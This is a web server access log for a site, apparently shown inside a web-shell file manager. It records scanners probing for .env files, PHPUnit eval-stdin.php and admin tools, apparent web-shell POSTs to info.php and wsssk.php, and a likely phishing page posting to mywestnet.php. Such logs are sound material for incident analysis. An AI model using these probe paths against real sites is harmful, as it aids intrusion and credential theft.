OwlCyberSecurity - MANAGER

Edit File: mgrokokbet.id.megahosting.pw-ssl_log

162.248.72.168 - - [22/Apr/2025:21:41:08 -0400] "GET /640275/about.php?ac=p&api=&path=&t=ddc09c13c65ad601aabdd847bfa585d8 HTTP/1.1" 200 36 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 162.248.72.168 - - [22/Apr/2025:21:41:10 -0400] "GET /640275/about.php?ac=upload_bs_for_old&api=&path=/home/megavujh/mgrokokbet.id&t=ddc09c13c65ad601aabdd847bfa585d8&s=1 HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 43.130.111.126 - - [23/Apr/2025:00:39:10 -0400] "GET /.env HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 43.130.111.126 - - [23/Apr/2025:00:39:10 -0400] "POST / HTTP/1.1" 200 1245 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 43.130.111.126 - - [23/Apr/2025:00:39:17 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "python-requests/2.31.0" 108.136.206.220 - - [23/Apr/2025:00:50:03 -0400] "GET /admin/javascripts/tinymce/filemanager/dialog.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1" 54.84.93.8 - - [23/Apr/2025:01:50:20 -0400] "GET /?ND HTTP/1.1" 200 1248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 52.73.142.41 - - [23/Apr/2025:02:30:11 -0400] "GET /?MA HTTP/1.1" 200 1244 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 66.249.79.168 - - [23/Apr/2025:02:30:54 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.79.168 - - [23/Apr/2025:02:30:59 -0400] "GET /.well-known/assetlinks.json HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 202.157.184.38 - - [23/Apr/2025:03:00:56 -0400] "GET / HTTP/1.1" 200 1245 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 202.157.184.38 - - [23/Apr/2025:03:00:57 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 23.23.103.31 - - [23/Apr/2025:04:06:32 -0400] "GET /admin.php HTTP/1.1" 404 28 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 206.189.144.184 - - [23/Apr/2025:05:23:55 -0400] "POST /mgrokokbet.id/cobbler_api HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (SS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 206.189.144.184 - - [23/Apr/2025:05:23:58 -0400] "GET / HTTP/1.1" 200 1245 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0" 206.189.144.184 - - [23/Apr/2025:05:25:10 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 206.189.144.184 - - [23/Apr/2025:05:25:17 -0400] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 206.189.144.184 - - [23/Apr/2025:05:25:22 -0400] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 206.189.144.184 - - [23/Apr/2025:05:25:26 -0400] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 206.189.144.184 - - [23/Apr/2025:05:25:30 -0400] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 206.189.144.184 - - [23/Apr/2025:05:25:34 -0400] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240" 3.221.50.71 - - [23/Apr/2025:06:25:28 -0400] "GET /error_log HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 40.77.167.85 - - [23/Apr/2025:07:47:51 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 40.77.167.85 - - [23/Apr/2025:07:47:51 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 52.167.144.203 - - [23/Apr/2025:07:47:52 -0400] "GET / HTTP/1.1" 200 1068 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.203 - - [23/Apr/2025:07:47:53 -0400] "GET /wp-urhmj.php HTTP/1.1" 200 1243 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.216 - - [23/Apr/2025:07:47:54 -0400] "GET /?ND HTTP/1.1" 200 1079 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.203 - - [23/Apr/2025:07:47:54 -0400] "GET /?SA HTTP/1.1" 200 1076 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.203 - - [23/Apr/2025:07:47:54 -0400] "GET /info.php HTTP/1.1" 200 3117 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.216 - - [23/Apr/2025:07:47:54 -0400] "GET /about.php HTTP/1.1" 200 895 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.203 - - [23/Apr/2025:07:47:54 -0400] "GET /cgi-bin/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.216 - - [23/Apr/2025:07:47:55 -0400] "GET /640275/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 54.36.148.74 - - [23/Apr/2025:07:47:56 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 40.77.167.136 - - [23/Apr/2025:07:47:59 -0400] "GET /?MA HTTP/1.1" 200 1073 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 40.77.167.136 - - [23/Apr/2025:07:47:59 -0400] "GET /error_log HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 40.77.167.136 - - [23/Apr/2025:07:47:59 -0400] "GET /admin.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.70.138.176 - - [23/Apr/2025:08:52:04 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 35.169.119.108 - - [23/Apr/2025:08:52:09 -0400] "GET /640275/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 64.124.8.103 - - [23/Apr/2025:09:33:17 -0400] "GET /robots.txt HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)" 64.124.8.103 - - [23/Apr/2025:09:33:18 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)" 108.136.206.220 - - [23/Apr/2025:10:20:34 -0400] "GET /admin/javascripts/tinymce/filemanager/filemanager/dialog.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1" 102.164.97.32 - - [23/Apr/2025:11:32:48 -0400] "GET /info.php HTTP/1.1" 200 3118 "https://www.bing.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:32:49 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:32:51 -0400] "POST /info.php HTTP/1.1" 200 8300 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:34:17 -0400] "POST /info.php HTTP/1.1" 200 3120 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:34:35 -0400] "POST /info.php HTTP/1.1" 200 31641 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:34:59 -0400] "POST /info.php HTTP/1.1" 200 3120 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:36:10 -0400] "POST /info.php HTTP/1.1" 200 31666 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:36:15 -0400] "POST /info.php HTTP/1.1" 200 31681 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:36:22 -0400] "POST /info.php HTTP/1.1" 200 3120 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:10 -0400] "POST /info.php HTTP/1.1" 200 3167 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:32 -0400] "GET /wsssk.php HTTP/1.1" 200 3156 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:40 -0400] "POST /wsssk.php HTTP/1.1" 200 3109 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:46 -0400] "POST /info.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:51 -0400] "GET / HTTP/1.1" 200 1058 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:51 -0400] "GET /_autoindex/assets/css/autoindex.css HTTP/1.1" 200 1170 "https://mgrokokbet.id/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:51 -0400] "GET /_autoindex/assets/js/tablesort.js HTTP/1.1" 200 2137 "https://mgrokokbet.id/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:51 -0400] "GET /_autoindex/assets/icons/folder-fill.svg HTTP/1.1" 200 333 "https://mgrokokbet.id/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:51 -0400] "GET /_autoindex/assets/js/tablesort.number.js HTTP/1.1" 200 322 "https://mgrokokbet.id/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:51 -0400] "GET /_autoindex/assets/icons/file-text.svg HTTP/1.1" 200 394 "https://mgrokokbet.id/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:52 -0400] "GET /_autoindex/assets/icons/file.svg HTTP/1.1" 200 354 "https://mgrokokbet.id/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:41:01 -0400] "POST /wsssk.php HTTP/1.1" 200 2476 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:41:03 -0400] "POST /wsssk.php HTTP/1.1" 200 2493 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:41:09 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:41:13 -0400] "POST /wsssk.php HTTP/1.1" 200 3173 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:41:24 -0400] "GET /admin.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:41:33 -0400] "GET /about.php HTTP/1.1" 200 912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:42:12 -0400] "GET /wsssk.php HTTP/1.1" 200 3161 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:42:20 -0400] "POST /wsssk.php HTTP/1.1" 200 3054 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:42:33 -0400] "GET /wp-urhmj.php HTTP/1.1" 200 1225 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:42:45 -0400] "POST /wsssk.php HTTP/1.1" 200 3036 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:43:35 -0400] "POST /wsssk.php HTTP/1.1" 200 3054 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:43:40 -0400] "GET /wp-urhmj.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:44:11 -0400] "POST /wsssk.php HTTP/1.1" 403 1242 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:44:22 -0400] "GET /wsssk.php HTTP/1.1" 200 3056 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:45:07 -0400] "POST /wsssk.php HTTP/1.1" 200 2477 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:45:24 -0400] "POST /wsssk.php HTTP/1.1" 200 3427 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:45:29 -0400] "POST /wsssk.php HTTP/1.1" 200 3116 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:45:32 -0400] "POST /wsssk.php HTTP/1.1" 200 2782 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:45:41 -0400] "POST /wsssk.php HTTP/1.1" 200 3116 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:45:59 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:46:04 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:46:16 -0400] "POST /mywestnet.php HTTP/1.1" 200 359 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:58:28 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:58:32 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:58:52 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:58:53 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:59:06 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:59:07 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:59:16 -0400] "POST /mywestnet.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:59:54 -0400] "POST /mywestnet.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:12:00:06 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:12:00:09 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:12:00:14 -0400] "POST /mywestnet.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 3.94.40.182 - - [23/Apr/2025:12:10:51 -0400] "GET /cgi-bin/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 23.23.99.55 - - [23/Apr/2025:12:48:06 -0400] "GET /?SA HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 143.198.90.128 - - [23/Apr/2025:12:48:15 -0400] "GET /wp/wp-admin/install.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 11; vivo 1904 Build/RP1A.200720.012;) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/104.0.5112.97 Mobile Safari/537.36" 143.198.90.128 - - [23/Apr/2025:12:48:16 -0400] "GET /new/wp-admin/install.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 11; vivo 1904 Build/RP1A.200720.012;) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/104.0.5112.97 Mobile Safari/537.36" 143.198.90.128 - - [23/Apr/2025:12:48:18 -0400] "GET /old/wp-admin/install.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 11; vivo 1904 Build/RP1A.200720.012;) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/104.0.5112.97 Mobile Safari/537.36" 143.198.90.128 - - [23/Apr/2025:12:48:19 -0400] "GET /wordpress/wp-admin/install.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 11; vivo 1904 Build/RP1A.200720.012;) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/104.0.5112.97 Mobile Safari/537.36" 143.198.90.128 - - [23/Apr/2025:12:48:19 -0400] "GET /wp-admin/install.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 11; vivo 1904 Build/RP1A.200720.012;) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/104.0.5112.97 Mobile Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:04:58 -0400] "POST /wsssk.php HTTP/1.1" 200 3073 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:05:02 -0400] "POST /wsssk.php HTTP/1.1" 200 3069 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:05:05 -0400] "POST /wsssk.php HTTP/1.1" 200 3073 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:05:29 -0400] "POST /wsssk.php HTTP/1.1" 200 3103 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; 